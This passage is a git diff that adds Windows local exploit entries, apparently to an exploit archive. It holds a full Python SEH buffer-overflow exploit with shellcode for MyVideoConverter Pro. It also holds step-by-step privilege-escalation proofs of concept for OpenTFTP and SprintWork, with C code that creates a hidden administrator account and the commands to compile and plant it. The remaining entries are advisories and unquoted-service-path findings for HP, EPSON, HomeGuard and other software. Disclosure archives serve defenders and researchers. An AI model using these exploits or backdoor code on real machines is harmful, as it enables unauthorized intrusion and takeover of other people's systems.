+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48056.py b/exploits/windows/local/48056.py
new file mode 100755
index 000000000..949de7fb6
--- /dev/null
+++ b/exploits/windows/local/48056.py
@@ -0,0 +1,53 @@
+# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
+# Exploit Author : ZwX
+# Exploit Date: 2020-02-11
+# Vendor Homepage : http://www.ivideogo.com/
+# Tested on OS: Windows 10 v1803
+# Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
+#2. Just copy the text inside "Shell.txt".
+#3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" .
+#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 268
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10039291)
+#0x10039291 : pop ecx # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("Shell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48057.txt b/exploits/windows/local/48057.txt
new file mode 100644
index 000000000..3c72433ba
--- /dev/null
+++ b/exploits/windows/local/48057.txt
@@ -0,0 +1,83 @@
+# Exploit Title: HP System Event Utility - Local Privilege Escalation
+# Author: hyp3rlinx
+# Date: 2020-02-11
+# Vendor: www.hp.com
+# Link: https://hp-system-event-utility.en.lo4d.com/download
+# CVE: CVE-2019-18915
+
+
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.hp.com
+
+
+[Product]
+HP System Event Utility
+
+
+The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc.
+HP System Event Utility enables the functioning of special function keys on select HP devices.
+
+
+[Vulnerability Type]
+Local Privilege Escalation
+
+
+
+[CVE Reference]
+CVE-2019-18915
+
+
+
+[Security Issue]
+The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
+HPMSGSVC.exe runs a background process that delivers push notifications.
+
+The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe"
+if found in the users c:\ drive.
+
+Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe
+
+Two Handles are inherit, properties are Write/Read
+Name: \Device\ConDrv
+
+This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location
+and can be used to escalate privileges from Admin to SYSTEM.
+
+HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359
+
+
+[References]
+PSR-2019-0204
+https://support.hp.com/us-en/document/c06559359
+
+
+
+[Network Access]
+Local
+
+
+[Disclosure Timeline]
+Vendor Notification:  October 7, 2019
+HP PSRT "product team will address the issue in next release" : January 13, 2020
+HP advisory and mitigation release : February 10, 2020
+February 11, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/48060.txt b/exploits/windows/local/48060.txt
new file mode 100644
index 000000000..2a65ef5fb
--- /dev/null
+++ b/exploits/windows/local/48060.txt
@@ -0,0 +1,103 @@
+# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
+# Exploit Author:  boku
+# Date: 2020-02-12
+# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
+# Software Link:   https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
+# Version:         1.66
+# Tested On:       Windows 10 (32-bit)
+
+# About:           
+# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, 
+# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." 
+# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
+
+# Vulnerability Details:
+# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. 
+# This allows a low-privilge, local attacker to escalate their permissions to Administrator; 
+# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. 
+# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the 
+# default installation. After the attacker has planted the malicious binary, the code will 
+# be executed with System priviledges on the next boot of the windows device. See PoC below for details.
+
+## Service Information (there is also an Unquoted Service Path)
+C:\>sc qc TFTPServer
+SERVICE_NAME: TFTPServer
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Open TFTP Single Port Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+## Insecure Folder Permission
+C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
+                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+                  BUILTIN\Users:(OI)(CI)(ID)R
+                  NT AUTHORITY\Authenticated Users:(ID)C
+                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
+
+## Insecure File/Service Permission
+C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
+                                       NT AUTHORITY\SYSTEM:(I)(F)
+                                       BUILTIN\Users:(I)(RX)
+                                       NT AUTHORITY\Authenticated Users:(I)(M)
+
+## Local Privilege Escalation Proof of Concept
+#0.  Download & install Open TFTP Server v1.66
+
+#1.  Create low privileged user & change to the user
+  C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
+  User name                    lowPrivUser
+  Local Group Memberships      *Users
+  Global Group memberships     *None
+  C:\>whoami
+  mycomputer\lowprivuser 
+
+#2.  Move the Service EXE to a new name
+  C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
+        1 file(s) moved.
+
+#3.  Create malicious binary on kali linux
+  1) Download dependencies
+   root@kali# apt install gcc-mingw-w64-i686 wine64 -y
+  2) Add Admin User C Code
+   root@kali# cat addAdmin.c
+   #include<windows.h>
+   int main(void){
+    system("net user hacker mypassword /add");
+    system("net localgroup Administrators hacker /add");
+    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
+    return 0;
+   }
+  3) Compile Code
+   root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
+
+#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host 
+
+#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
+  C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
+        1 file(s) moved.
+  C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
+  02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
+  02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe
+
+#6. Reboot the Computer
+
+#7. Look at that new Admin
+  C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
+  User name                    hacker
+  Account active               Yes
+  Local Group Memberships      *Administrators       *Users
+
+  C:\Users\lowPrivUser>net localgroup Administrators
+  Alias name     Administrators
+  Comment        Administrators have complete and unrestricted access to the computer/domain
+
+  Members
+  -------------------------------------------------------------------------------
+  Administrator
+  boku
+  hacker
\ No newline at end of file
diff --git a/exploits/windows/local/48068.txt b/exploits/windows/local/48068.txt
new file mode 100644
index 000000000..4ad1a0b9b
--- /dev/null
+++ b/exploits/windows/local/48068.txt
@@ -0,0 +1,28 @@
+# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
+# Exploit Author: boku
+# Date: 2020-02-13
+# Vendor Homepage: https://veridium.net
+# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
+# Version 9.3.1
+# Tested On: Windows 10 (32-bit)
+
+# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions
+
+## Service Information (Unquoted Service Path)
+C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
+Name            PathName                                       StartMode    StartName
+HG52 AM VI      C:\Program Files\HomeGuard Pro\vglset.exe      Auto         LocalSystem
+HG52 AMC        C:\Program Files\HomeGuard Pro\vglsetw.exe     Auto         LocalSystem
+HG52 AM REM     C:\Program Files\HomeGuard Pro\vglrem.exe      Auto         LocalSystem
+HG52 AM SRV     C:\Program Files\HomeGuard Pro\vglserv.exe     Auto         LocalSystem
+
+## Insecure Folder Permission
+C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
+C:\Program Files\HomeGuard Pro               BUILTIN\Users:(F)
+
+## Insecure File/Service Permission
+C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
+C:\Program Files\HomeGuard Pro\vglrem.exe    BUILTIN\Users:(I)(F)
+C:\Program Files\HomeGuard Pro\VGLSERV.EXE   BUILTIN\Users:(I)(F)
+C:\Program Files\HomeGuard Pro\vglset.exe    BUILTIN\Users:(I)(F)
+C:\Program Files\HomeGuard Pro\vglsetw.exe   BUILTIN\Users:(I)(F)
\ No newline at end of file
diff --git a/exploits/windows/local/48069.txt b/exploits/windows/local/48069.txt
new file mode 100644
index 000000000..b6379a86c
--- /dev/null
+++ b/exploits/windows/local/48069.txt
@@ -0,0 +1,34 @@
+# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-02-13
+# Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows
+# Software Link :https://ftp.epson.com/drivers/epson16189.exe
+# SEIKO EPSON CORP
+# Tested Version: 2.81
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path: 
+
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """
+EMP_NSWLSV                                                EMP_NSWLSV                                C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe                                                                                                                                                                                                   Auto
+
+C:\>sc qc "EMP_NSWLSV"
+[SC] QueryServiceConfig SUCCESS
+        SERVICE_NAME: EMP_NSWLSV                                                                                                                                                                    
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : EMP_NSWLSV
+        DEPENDENCIES       : RPCSS
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48070.txt b/exploits/windows/local/48070.txt
new file mode 100644
index 000000000..4ac433952
--- /dev/null
+++ b/exploits/windows/local/48070.txt
@@ -0,0 +1,128 @@
+# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation
+# Exploit Author: boku
+# Date: 2020-02-13
+# Vendor Homepage: https://veridium.net
+# Software Link:  https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe
+# Version: 2.3.1
+# Tested On: Windows 10 (32-bit)
+
+# Vulnerability Overview:
+# SprintWork v2.3.1 (x86) suffers from insecure file & service & folder permissions, unquoted service paths, 
+# and a missing executable for one of the two Service it installs; to be ran as 'LocalSystem'. 
+# This allows any local user to gain persistent code-execution as 'LocalSystem'.
+# Both the 32bit & 64bit build of SprintWork v2.3.1 create the services 'SP52 AMC' & 'SprintWork TM VI', with the "StartMode" set to 'Auto', to be ran as 'LocalSystem'; these services will ran every time the computer starts. The 'SP52 AMC' Service is set to use the 'nvlsimw.exe' file. On the 32bit version, the 'nvlsimw.exe' file is never created. This, in combination with its other vulnerabilities, results in persistent code-execution for any local user as 'LocalSystem'. 
+# See Proof of Concept below for full details.
+# About:
+# "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity
+# + Block or time restrict social networks, online games or any website
+# - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time.
+# + Block or time restrict games and programs
+# - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day.
+# + Detailed activity monitoring and reporting
+# - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits.
+# + Selective user monitoring and blocking.
+# - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers.
+# + Wildcard support
+# - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain.
+# + Multiple website blocking lists.
+# - Block or set time restrictions collectively for groups of websites.
+# + Cannot be bypassed, deleted or disabled.
+# - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password."
+# - https://veridium.net/sprintwork/
+
+## Service Information (there is also an Unquoted Service Path)
+C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork
+SP52 AMC              C:\Program Files\SprintWork\nvlsimw.exe    Auto       LocalSystem               
+SprintWork TM VI      C:\Program Files\SprintWork\nvlsim.exe     Auto       LocalSystem 
+
+## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service 
+C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe"
+11/23/2019  10:20 PM         1,345,536 NVLSIM.EXE
+12/25/2019  02:47 PM         1,202,688 qcden.exe
+12/25/2019  02:47 PM        14,436,864 SprintWork.exe
+11/23/2019  10:20 PM         1,557,504 txew.exe
+
+## Insecure Folder Permission
+C:\>icacls "C:\Program Files\SprintWork"
+C:\Program Files\SprintWork BUILTIN\Users:(F)
+                            BUILTIN\Users:(OI)(CI)(IO)(F)
+
+## Insecure File/Service Permission
+C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE"
+C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F)
+
+## Local Privilege Escalation Proof of Concept
+#0. Download & install SprintWork v2.3.1 (x86) on Windows 10 32bit Operating System
+
+#1. Create low privileged user 
+C:\Windows\system32>net user lowpriv password /add
+
+#2. Change to lowpriv User
+C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
+User name                    lowPrivUser
+Local Group Memberships      *Users
+Global Group memberships     *None
+C:\>whoami
+mycomputer\lowprivuser 
+
+#3. Create malicious binary on Kali Linux
+3.1) Download dependencies
+root@kali# apt install gcc-mingw-w64-i686 wine64 -y
+
+3.2) Create Add Admin User C Code
+root@kali# cat addAdmin.c
+#include<windows.h>
+int main(void){
+ system("net user adminpriv mypassword /add");
+ system("net localgroup Administrators adminpriv /add");
+ return 0;
+}
+
+3.3) Compile Code
+root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe
+
+#4. Transfer created 'nvlsimw.exe' to the Windows Host 
+
+#5. Move the created 'nvlsimw.exe' binary to the 'C:\Program Files\SprintWorks\' Directory
+C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\"
+        1 file(s) moved.
+
+C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim
+11/23/2019  10:20 PM         1,345,536 NVLSIM.EXE
+02/13/2020  06:07 PM           288,469 nvlsimw.exe
+
+#6. Verify localgroup 'Administrators' members
+C:\Users\lowpriv>net localgroup Administrators
+Alias name     Administrators
+Comment        Administrators have complete and unrestricted access to the computer/domain
+
+Members
+
+-------------------------------------------------------------------------------
+Administrator
+boku
+
+#6. Reboot the Computer
+C:\Users\lowpriv>shutdown /r /t 0
+
+#7. Verify user 'adminpriv' was created & added to the localgroup 'Administrators'
+C:\>net localgroup Administrators
+Alias name     Administrators
+Comment        Administrators have complete and unrestricted access to the computer/domain
+
+Members
+
+-------------------------------------------------------------------------------
+Administrator
+adminpriv
+boku
+
+C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group
+User name                    adminpriv
+Account active               Yes
+Password last set            ?2/?13/?2020 6:18:03 PM
+Password expires             Never
+Password changeable          ?2/?13/?2020 6:18:03 PM
+Password required            Yes
+Local Group Memberships      *Administrators       *Users
+Global Group memberships     *None
\ No newline at end of file
diff --git a/exploits/windows/local/48071.md b/exploits/windows/local/48071.md
new file mode 100644
index 000000000..67a1403b5
--- /dev/null
+++ b/exploits/windows/local/48071.md
@@ -0,0 +1,27 @@
+# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125))
+
+This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019.
+
+## Contents
+
+* leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header)
+* leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header)
+* whitepaper
+* Black Hat USA 2019 presentation
+
+## Prerequisites
+
+1. Visual Studio 2015
+2. Unpatched Windows x64 (7 or newer)
+
+## Authors
+
+* Andrei Vlad LUȚAȘ
+* Dan Horea LUȚAȘ
+
+## Additional resources
+
+[Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE)
+
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48071.zip
\ No newline at end of file
diff --git a/exploits/windows/local/48075.txt b/exploits/windows/local/48075.txt
new file mode 100644
index 000000000..6e1aeef57
--- /dev/null
+++ b/exploits/windows/local/48075.txt
@@ -0,0 +1,35 @@
+# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-02-14
+# Vendor Homepage:https://www8.hp.com/mx/es/home.html
+# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe
+# HP Development Company, L.P.
+# Tested Version: 1.2.9.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """
+HPWMISVC                                                  HPWMISVC                                  C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe                                                                                                                                                                                                                  Auto
+
+C:\>sc qc HPWMISVC
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: HPWMISVC
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : HPWMISVC
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system 
+# root path undetected by the OS or other security applications where it could potentially be 
+# executed during application startup or reboot. If successful, the local user's code would 
+# execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48078.txt b/exploits/windows/local/48078.txt
new file mode 100644
index 000000000..7d0804ed4
--- /dev/null
+++ b/exploits/windows/local/48078.txt
@@ -0,0 +1,27 @@
+# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
+# Exploit Author: boku
+# Date: 2020-02-10
+# Vendor Homepage: https://www.weird-solutions.com
+# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
+# Version: 2.0.1214
+# Tested On: Windows 10 (32-bit)
+
+C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """
+BOOTP Turbo                               C:\Program Files\BOOTP Turbo\bootpt.exe                                            Auto
+
+C:\Users\user>sc qc "BOOTP Turbo"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BOOTP Turbo
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\BOOTP Turbo\bootpt.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : BOOTP Turbo
+        DEPENDENCIES       : Nsi
+                           : Afd
+                           : NetBT
+                           : Tcpip
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48079.txt b/exploits/windows/local/48079.txt
new file mode 100644
index 000000000..60cf85d58
--- /dev/null
+++ b/exploits/windows/local/48079.txt
@@ -0,0 +1,104 @@
+# Exploit Title:  MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
+# Author: nu11secur1ty
+# Date: 2020-02-14
+# Vendor: Microsoft
+# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
+# CVE: CVE-2020-0683
+
+
+[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
+[+] Website: https://www.nu11secur1ty.com/
+[+] Source:  readme from GitHUB
+[+] twitter.com/nu11secur1ty
+
+
+[Exploit Program]
+Link:
+https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
+
+
+[Vendor]
+Microsoft
+
+
+[Vulnerability Type]
+Windows Installer Elevation of Privilege Vulnerability
+
+[CVE Reference]
+
+An elevation of privilege vulnerability exists in the Windows Installer
+when MSI packages process symbolic links. An attacker who successfully
+exploited this vulnerability could bypass access restrictions to add or
+remove files.
+
+To exploit this vulnerability, an attacker would first have to log on to
+the system. An attacker could then run a specially crafted application that
+could exploit the vulnerability and add or remove files.
+
+The security update addresses the vulnerability by modifying how to reparse
+points are handled by the Windows Installer.
+
+
+[Security Issue]
+Elevation of Privilege from user to C:\Windows\administartion execution
+files
+
+
+[References]
+
+# CVE-2020-0683
+Original Poc sent to MSRC.
+Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege
+https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683
+
+Source code for Visual Studio C++ 2019
+
+Inside "nu11secur1ty" you'll find the exploit (exe) to execute.
+
+# Note:
+
+This test is using `system.ini` in c:\Windows\system.ini
+When you exploit this file you should replace with the original file
+`system.ini` after this test, which you will find in CVE-2020-0683
+directory :)
+
+--------------------------------------------------------------------------
+
+- - How to run the exploit
+
+Go into "nu11secur1ty" directory and from a cmd console launch:
+
+- for the test
+
+MsiExploit.exe  c:\Windows\system.ini"
+
+Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.
+
+- Disclaimer:
+
+ The entry creation date may reflect when the CVE ID was allocated or
+reserved, and does not necessarily indicate when this vulnerability
+was discovered, shared with the affected vendor, publicly disclosed,
+or updated in CVE.
+
+
+- @nu11secur1ty
+
+
+[Network Access]
+Local
+
+
+[Disclosure Timeline]
+02/11/2020
+
+[Disclaimer]
+
+ The entry creation date may reflect when the CVE ID was allocated or
+reserved, and does not necessarily indicate when this vulnerability
+was discovered, shared with the affected vendor, publicly disclosed,
+or updated in CVE.
+
+
+nu11secur1ty
+--
\ No newline at end of file
diff --git a/exploits/windows/local/48080.txt b/exploits/windows/local/48080.txt
new file mode 100644
index 000000000..0a1a8c538
--- /dev/null
+++ b/exploits/windows/local/48080.txt
@@ -0,0 +1,26 @@
+Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
+Exploit Author: boku
+Date: 2020-02-10
+Vendor Homepage: https://www.weird-solutions.com
+Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe
+Version: 4.6.1298
+Tested On: Windows 10 (32-bit)
+
+C:\Users\user>sc qc "DHCP Turbo 4"
+SERVICE_NAME: DHCP Turbo 4
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\DHCP Turbo 4\dhcpt.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : DHCP Turbo 4
+        DEPENDENCIES       : Nsi
+                           : Afd
+                           : NetBT
+                           : Tcpip
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo"
+DisplayName         PathName                                      StartMode 
+DHCP Turbo 4        C:\Program Files\DHCP Turbo 4\dhcpt.exe       Auto
\ No newline at end of file
